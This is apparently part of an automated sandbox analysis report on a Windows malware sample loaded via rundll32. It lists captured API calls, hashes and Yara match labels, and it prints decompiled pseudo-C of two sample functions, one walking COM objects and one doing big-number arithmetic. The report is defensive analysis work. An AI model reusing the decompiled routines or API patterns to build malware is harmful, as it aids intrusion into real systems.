                                • Instruction ID: d17f4ba18b907f29a58e53a63016a42921db03cb95d119542618fe17a3a01bed
                                • Opcode Fuzzy Hash: 18e28eba467165ca47b1165072ff888136495f29956f10e579e69d032e21a353
                                • Instruction Fuzzy Hash: E311CA31000609EFDF22BF61DC44A9F7BE8EF0A368F244666F911991E0C331E852DBA4
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 03490AB4
                                  • Part of subcall function 0348EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0348EC20
                                  • Part of subcall function 0348EC09: SetEvent.KERNEL32(?,?,?,?,03473EC6,?,?), ref: 0348EC30
                                • lstrlen.KERNEL32(?,?,?,?,?,0347859B,?,?), ref: 03490AD7
                                • lstrlen.KERNEL32(?,?,?,?,0347859B,?,?), ref: 03490AE1
                                • memcpy.NTDLL(?,?,00004000,?,?,0347859B,?,?), ref: 03490AF2
                                • HeapFree.KERNEL32(00000000,?,?,?,?,0347859B,?,?), ref: 03490B14
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                                • String ID:
                                • API String ID: 442095154-0
                                • Opcode ID: 5052e380472d333418d8d4c5edb1c329ba481bde9868d04eb9a37191c6adc3a6
                                • Instruction ID: 2b668ef7cbe6966014dde04a8b505ca86529f4fdbe75ef60f696ff595195b9c8
                                • Opcode Fuzzy Hash: 5052e380472d333418d8d4c5edb1c329ba481bde9868d04eb9a37191c6adc3a6
                                • Instruction Fuzzy Hash: 7A118E75900204EFDF11EF95EC44E5EBFF9EB96364F21406BE905AB210E6319D04DB64
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0347AE7C: lstrlen.KERNEL32(0347E448,00000000,00000000,?,?,03487A5B,?,?,?,?,0347E448,?), ref: 0347AE8B
                                  • Part of subcall function 0347AE7C: mbstowcs.NTDLL ref: 0347AEA7
                                • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0347E448,?), ref: 03487A6A
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03487A7C
                                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0347E448,?), ref: 03487A99
                                • lstrlenW.KERNEL32(00000000,?,?,0347E448,?), ref: 03487AA5
                                • HeapFree.KERNEL32(00000000,00000000,?,?,0347E448,?), ref: 03487AB9
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                • String ID:
                                • API String ID: 3403466626-0
                                • Opcode ID: eca6e1b9aa99c582ac9b5ef2638a003bfaa5f4c69a1c44333fc301d5dd620dd0
                                • Instruction ID: 1d3a8db82933b48cc945a9601c29b655377f3de01db9ffc22c217a58b51dbc72
                                • Opcode Fuzzy Hash: eca6e1b9aa99c582ac9b5ef2638a003bfaa5f4c69a1c44333fc301d5dd620dd0
                                • Instruction Fuzzy Hash: F8018C72101204BFC712EF99EC85FAE7BECEF5A310F150056FA05AF214C77499048BA4
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32 ref: 0347F4BF
                                • GetModuleHandleA.KERNEL32 ref: 0347F4CD
                                • LoadLibraryExW.KERNEL32(?,?,?), ref: 0347F4DA
                                • GetModuleHandleA.KERNEL32 ref: 0347F4F1
                                • GetModuleHandleA.KERNEL32 ref: 0347F4FD
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HandleModule$LibraryLoad
                                • String ID:
                                • API String ID: 1178273743-0
                                • Opcode ID: 1fe36466f5e92031cc9649fcba45c18bdc8a2e7c3e12ca9219a8ded647cef19a
                                • Instruction ID: 5f69d0f6b732834b9285aff31f07116fda880765749c839ef69a94624b26fd18
                                • Opcode Fuzzy Hash: 1fe36466f5e92031cc9649fcba45c18bdc8a2e7c3e12ca9219a8ded647cef19a
                                • Instruction Fuzzy Hash: 04016231600306ABDF41AF69EC459ABBBE9FF542A1708007BED14DA224DB71C8159B94
                                Uniqueness
                                • Uniqueness Score: -1.00%

                                APIs
                                • RtlEnterCriticalSection.NTDLL(0349A400), ref: 03491664
                                • RtlLeaveCriticalSection.NTDLL(0349A400), ref: 03491675
                                • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,03484B8B,?,?,0349A428,034725BA,00000003), ref: 0349168C
                                • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,03484B8B,?,?,0349A428,034725BA,00000003), ref: 034916A6
                                • GetLastError.KERNEL32(?,?,03484B8B,?,?,0349A428,034725BA,00000003), ref: 034916B3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                • String ID:
                                • API String ID: 653387826-0
                                • Opcode ID: b04b10605b3a57bb08308a3192a2fe5656825ada64ce8f1cd0df1a296a5f3eba
                                • Instruction ID: d90f07587a378d9cfb693517dd35f16ed6c4164af42fb3a9dc716585aa386a7d
                                • Opcode Fuzzy Hash: b04b10605b3a57bb08308a3192a2fe5656825ada64ce8f1cd0df1a296a5f3eba
                                • Instruction Fuzzy Hash: 1501DF75600304EFD721EF25CC04D2ABBF8EF85220B21816AEA029B350C770ED028FA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,0347396C), ref: 0348BDCC
                                • StrTrimA.SHLWAPI(00000001,?,?,0347396C), ref: 0348BDEF
                                • StrTrimA.SHLWAPI(00000000,?,?,0347396C), ref: 0348BDFE
                                • _strupr.NTDLL ref: 0348BE01
                                • lstrlen.KERNEL32(00000000,0347396C), ref: 0348BE09
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Trim$_struprlstrlen
                                • String ID:
                                • API String ID: 2280331511-0
                                • Opcode ID: 7f8db76737d1675a9fe65160b0545b0e568ff1c07d1bbee0dd4359277bb689c6
                                • Instruction ID: 70111f0fbf0a8701628f472abf09b24ddc6eede4046b26f53c9d7f395b5f3299
                                • Opcode Fuzzy Hash: 7f8db76737d1675a9fe65160b0545b0e568ff1c07d1bbee0dd4359277bb689c6
                                • Instruction Fuzzy Hash: 0CF06771201111AFEB06FB29EC89E3F37ECEB5A659B14015BF909EF244DB259C0287A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03482397,?), ref: 03480820
                                • GetVersion.KERNEL32 ref: 0348082F
                                • GetCurrentProcessId.KERNEL32 ref: 0348084B
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03480868
                                • GetLastError.KERNEL32 ref: 03480887
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 7cb99d60ada7e30c24f488f58462c2cf5abd51520445e118c69782d1397b7135
                                • Instruction ID: 9d75b539421faa9e86659e2ed89ad688efd45389645100a55ba465703a549c13
                                • Opcode Fuzzy Hash: 7cb99d60ada7e30c24f488f58462c2cf5abd51520445e118c69782d1397b7135
                                • Instruction Fuzzy Hash: 85F06870650301BBD725FF64A81BB1A3BE1E755741F240957E64AED2DCD7708085CB9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 034789FB
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 03478A0B
                                • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 03478A14
                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,03482F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 03478A32
                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,03482F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 03478A3F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                • String ID:
                                • API String ID: 3667519916-0
                                • Opcode ID: e624a82c7e37b3a1d9c12c1150bc7ed4d15ae78be33decc5a7fad779d9f93ea5
                                • Instruction ID: b12c2ac11363d9036d2d2f1fa5d001c83754f8ceb715b49b4f8b6b5c8d22b587
                                • Opcode Fuzzy Hash: e624a82c7e37b3a1d9c12c1150bc7ed4d15ae78be33decc5a7fad779d9f93ea5
                                • Instruction Fuzzy Hash: E9F09030200700AFDB21BB35DC49B1BB3F8EF55611F24062AF041AA590CB30E841CA68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0348C4A8
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • wsprintfA.USER32 ref: 0348C4D9
                                  • Part of subcall function 0347AAAF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0347A1A1), ref: 0347AAC5
                                  • Part of subcall function 0347AAAF: wsprintfA.USER32 ref: 0347AAED
                                  • Part of subcall function 0347AAAF: lstrlen.KERNEL32(?), ref: 0347AAFC
                                  • Part of subcall function 0347AAAF: wsprintfA.USER32 ref: 0347AB3C
                                  • Part of subcall function 0347AAAF: wsprintfA.USER32 ref: 0347AB71
                                  • Part of subcall function 0347AAAF: memcpy.NTDLL(00000000,?,?), ref: 0347AB7E
                                  • Part of subcall function 0347AAAF: memcpy.NTDLL(00000008,034953E8,00000002,00000000,?,?), ref: 0347AB93
                                  • Part of subcall function 0347AAAF: wsprintfA.USER32 ref: 0347ABB6
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0348C54E
                                  • Part of subcall function 03492968: RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 0349297E
                                  • Part of subcall function 03492968: RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03492999
                                • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 0348C538
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0348C544
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                • String ID:
                                • API String ID: 3553201432-0
                                • Opcode ID: 7027e53e3f89b9691e599fcac3a4a1db30bbb6cc1aa740ba87c08db9cea4e4c3
                                • Instruction ID: 086b07d06696b53141f6d3d9df9e3e5e5b427fcdd31592c90270692e304c216e
                                • Opcode Fuzzy Hash: 7027e53e3f89b9691e599fcac3a4a1db30bbb6cc1aa740ba87c08db9cea4e4c3
                                • Instruction Fuzzy Hash: 68210776900259AFCF11EFA9DC89CDF7FB9FB89310B04441BF915AA210D7719A24DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • HeapFree.KERNEL32(00000000,?), ref: 0347EFBC
                                • HeapFree.KERNEL32(00000000,?), ref: 0347EFCD
                                • HeapFree.KERNEL32(00000000,?), ref: 0347EFE5
                                • CloseHandle.KERNEL32(?), ref: 0347EFFF
                                • HeapFree.KERNEL32(00000000,?), ref: 0347F014
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap$CloseHandle
                                • String ID:
                                • API String ID: 1910495013-0
                                • Opcode ID: b5493f6ecae0d7588c59bb0db69973937c2d1c619253c42d97297fcff4d25be4
                                • Instruction ID: eeb03d27ee50afe6becddaa1ffaad6810ee8e6bbf5528ea3d65717405dc92151
                                • Opcode Fuzzy Hash: b5493f6ecae0d7588c59bb0db69973937c2d1c619253c42d97297fcff4d25be4
                                • Instruction Fuzzy Hash: AB213A31201521BFC222EF66DC88C5AFBAAFF49B503590556F408DBA54C731ECA6DA94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0347EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0347EC1B
                                  • Part of subcall function 0347EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0347EC69
                                  • Part of subcall function 0347EC00: GetProcAddress.KERNEL32(00000000,?), ref: 0347EC82
                                  • Part of subcall function 0347EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0347ECD3
                                • GetLastError.KERNEL32(?,?,00000001), ref: 0348987C
                                • FreeLibrary.KERNEL32(?,?,00000001), ref: 034898E4
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                • String ID:
                                • API String ID: 1730969706-0
                                • Opcode ID: 17bf9d4cb8c04316e61556cb84b0512a8035c3ec5d080b3708080d16306eeada
                                • Instruction ID: f1e31dedc97fa41f0f8a0f7baa2e55e83574cf37405775eb359b7f4393da7741
                                • Opcode Fuzzy Hash: 17bf9d4cb8c04316e61556cb84b0512a8035c3ec5d080b3708080d16306eeada
                                • Instruction Fuzzy Hash: 6E71FB75D0060AEFCF10EFE5C8849AEBBB9FF48304B1449AAE516AB350D731A945CF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E03432732(intOrPtr* __eax) {
                                				void* _v8;
                                				WCHAR* _v12;
                                				void* _v16;
                                				char _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				void* _v32;
                                				intOrPtr _v40;
                                				short _v48;
                                				intOrPtr _v56;
                                				short _v64;
                                				intOrPtr* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t57;
                                				intOrPtr* _t58;
                                				intOrPtr* _t60;
                                				void* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				short _t67;
                                				intOrPtr* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t72;
                                				intOrPtr* _t75;
                                				intOrPtr* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t83;
                                				intOrPtr* _t87;
                                				intOrPtr _t103;
                                				intOrPtr _t109;
                                				void* _t118;
                                				void* _t122;
                                				void* _t123;
                                				intOrPtr _t130;
                                
                                				_t123 = _t122 - 0x3c;
                                				_push( &_v8);
                                				_push(__eax);
                                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                				if(_t118 >= 0) {
                                					_t54 = _v8;
                                					_t103 =  *0x343a348; // 0x21ad5a8
                                					_t5 = _t103 + 0x343b038; // 0x3050f485
                                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                					_t56 = _v8;
                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                					if(_t118 >= 0) {
                                						__imp__#2(0x3439290);
                                						_v28 = _t57;
                                						if(_t57 == 0) {
                                							_t118 = 0x8007000e;
                                						} else {
                                							_t60 = _v32;
                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                							_t87 = __imp__#6;
                                							_t118 = _t61;
                                							if(_t118 >= 0) {
                                								_t63 = _v24;
                                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                								if(_t118 >= 0) {
                                									_t130 = _v20;
                                									if(_t130 != 0) {
                                										_t67 = 3;
                                										_v64 = _t67;
                                										_v48 = _t67;
                                										_v56 = 0;
                                										_v40 = 0;
                                										if(_t130 > 0) {
                                											while(1) {
                                												_t68 = _v24;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t123 = _t123;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                												if(_t118 < 0) {
                                													goto L16;
                                												}
                                												_t70 = _v8;
                                												_t109 =  *0x343a348; // 0x21ad5a8
                                												_t28 = _t109 + 0x343b0bc; // 0x3050f1ff
                                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                												if(_t118 >= 0) {
                                													_t75 = _v16;
                                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                													if(_t118 >= 0 && _v12 != 0) {
                                														_t79 =  *0x343a348; // 0x21ad5a8
                                														_t33 = _t79 + 0x343b078; // 0x76006f
                                														if(lstrcmpW(_v12, _t33) == 0) {
                                															_t83 = _v16;
                                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                														}
                                														 *_t87(_v12);
                                													}
                                													_t77 = _v16;
                                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                												}
                                												_t72 = _v8;
                                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                												_v40 = _v40 + 1;
                                												if(_v40 < _v20) {
                                													continue;
                                												}
                                												goto L16;
                                											}
                                										}
                                									}
                                								}
                                								L16:
                                								_t65 = _v24;
                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                							}
                                							 *_t87(_v28);
                                						}
                                						_t58 = _v32;
                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                					}
                                				}
                                				return _t118;
                                 			}

                                APIs
                                • SysAllocString.OLEAUT32(03439290), ref: 03432782
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 03432863
                                • SysFreeString.OLEAUT32(00000000), ref: 0343287C
                                • SysFreeString.OLEAUT32(?), ref: 034328AB
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                 • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 109bd4191c8d33f49c81aeafd07145186cfeb0110cf82980545432d4b576b060
                                • Instruction ID: 7dee0af910901251b6108c1f5181a2fba501d31a2dba7b9471d0e5a8e8108c6a
                                • Opcode Fuzzy Hash: 109bd4191c8d33f49c81aeafd07145186cfeb0110cf82980545432d4b576b060
                                • Instruction Fuzzy Hash: D8516A75D00619EFCB04DFA8C8889AEF7B9EF89700B244A99E815EF314D7719D41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 03435BD8
                                • SysFreeString.OLEAUT32(00000000), ref: 03435CBD
                                  • Part of subcall function 03432732: SysAllocString.OLEAUT32(03439290), ref: 03432782
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 03435D10
                                • SysFreeString.OLEAUT32(00000000), ref: 03435D1F
                                  • Part of subcall function 03433A62: Sleep.KERNEL32(000001F4), ref: 03433AAA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                 • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 409747303a32df45bc69e023d75ab0e86dd9f8b75ccacbeab56e573a06cbfb5c
                                • Instruction ID: 016eee563f5b88e8580099d07eb08226373e899e1b4b98b402855bc995e35137
                                • Opcode Fuzzy Hash: 409747303a32df45bc69e023d75ab0e86dd9f8b75ccacbeab56e573a06cbfb5c
                                • Instruction Fuzzy Hash: D4515C79500609AFDB01DFA8D844AAEB7B6FF8D704B148469E905EF324DB70ED05CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,0348DD27,00000000,0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?), ref: 03492E89
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • ResetEvent.KERNEL32(?,?,?,?,0348DD27,00000000,0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?,00000000,03473EC6), ref: 03492F00
                                • GetLastError.KERNEL32(?,?,?,0348DD27,00000000,0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?,00000000,03473EC6,?), ref: 03492F2D
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                • GetLastError.KERNEL32(?,?,?,0348DD27,00000000,0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?,00000000,03473EC6,?), ref: 03492FEF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                • String ID:
                                • API String ID: 943265810-0
                                • Opcode ID: bb342a349ab8e71bb513ac7c17b3081960659fdda6042e7881e23e7abe1e8b1e
                                • Instruction ID: 872563278497249cd012f9b98c507e8ffaeafd2168cc6b32e2cdccf829f140c9
                                • Opcode Fuzzy Hash: bb342a349ab8e71bb513ac7c17b3081960659fdda6042e7881e23e7abe1e8b1e
                                • Instruction Fuzzy Hash: C2416171500208BFEF21EFA1DC89EAB7BECEB14700B14492BF502DA194E7B09945DA64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 03484E5C
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03484E72
                                • memset.NTDLL ref: 03484F1B
                                • memset.NTDLL ref: 03484F31
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 7c12f87b059297e6c8a347e0d2f372896335b8a9e52081bb33d95e70d15cc544
                                • Instruction ID: 6f7cc9fe8bde71cd9d484020c795960444bc7cf19eece5c9ae9810fa4cae9b06
                                • Opcode Fuzzy Hash: 7c12f87b059297e6c8a347e0d2f372896335b8a9e52081bb33d95e70d15cc544
                                • Instruction Fuzzy Hash: EE419135A00215AFDF10EF6ACC80BEEB7A9EF45314F04456AE819AF380DB709E458B55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E03431DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				void _v156;
                                				void _v428;
                                				void* _t55;
                                				unsigned int _t56;
                                				signed int _t66;
                                				signed int _t74;
                                				void* _t76;
                                				signed int _t79;
                                				void* _t81;
                                				void* _t92;
                                				void* _t96;
                                				signed int* _t99;
                                				signed int _t101;
                                				signed int _t103;
                                				void* _t107;
                                
                                				_t92 = _a12;
                                				_t101 = __eax;
                                				_t55 = E03432FAB(_a16, _t92);
                                				_t79 = _t55;
                                				if(_t79 == 0) {
                                					L18:
                                					return _t55;
                                				}
                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                				_t81 = 0;
                                				_t96 = 0x20;
                                				if(_t56 == 0) {
                                					L4:
                                					_t97 = _t96 - _t81;
                                					_v12 = _t96 - _t81;
                                					E03431CC1(_t79,  &_v428);
                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E03432920(_t101,  &_v428, _a8, _t96 - _t81);
                                					E03432920(_t79,  &_v156, _a12, _t97);
                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                					_t66 = E03431CC1(_t101, 0x343a1d0);
                                					_t103 = _t101 - _t79;
                                					_a8 = _t103;
                                					if(_t103 < 0) {
                                						L17:
                                						E03431CC1(_a16, _a4);
                                						E03433ADA(_t79,  &_v428, _a4, _t97);
                                						memset( &_v428, 0, 0x10c);
                                						_t55 = memset( &_v156, 0, 0x84);
                                						goto L18;
                                					}
                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                					do {
                                						if(_v8 != 0xffffffff) {
                                							_push(1);
                                							_push(0);
                                							_push(0);
                                							_push( *_t99);
                                							L0343824A();
                                							_t74 = _t66 +  *(_t99 - 4);
                                							asm("adc edx, esi");
                                							_push(0);
                                							_push(_v8 + 1);
                                							_push(_t92);
                                							_push(_t74);
                                							L03438244();
                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                								_t74 = _t74 | 0xffffffff;
                                								_v16 = _v16 & 0x00000000;
                                							}
                                						} else {
                                							_t74 =  *_t99;
                                						}
                                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                						_a12 = _t74;
                                						_t76 = E0343241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                						while(1) {
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							L13:
                                							_t92 =  &_v156;
                                							if(E03432378(_t79, _t92, _t106) < 0) {
                                								break;
                                							}
                                							L14:
                                							_a12 = _a12 + 1;
                                							_t76 = E034379CC(_t79,  &_v156, _t106, _t106);
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							goto L13;
                                						}
                                						_a8 = _a8 - 1;
                                						_t66 = _a12;
                                						_t99 = _t99 - 4;
                                						 *(0x343a1d0 + _a8 * 4) = _t66;
                                					} while (_a8 >= 0);
                                					_t97 = _v12;
                                					goto L17;
                                				}
                                				while(_t81 < _t96) {
                                					_t81 = _t81 + 1;
                                					_t56 = _t56 >> 1;
                                					if(_t56 != 0) {
                                						continue;
                                					}
                                					goto L4;
                                				}
                                				goto L4;
                                			}

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 03431E96
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03431EAC
                                • memset.NTDLL ref: 03431F55
                                • memset.NTDLL ref: 03431F6B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
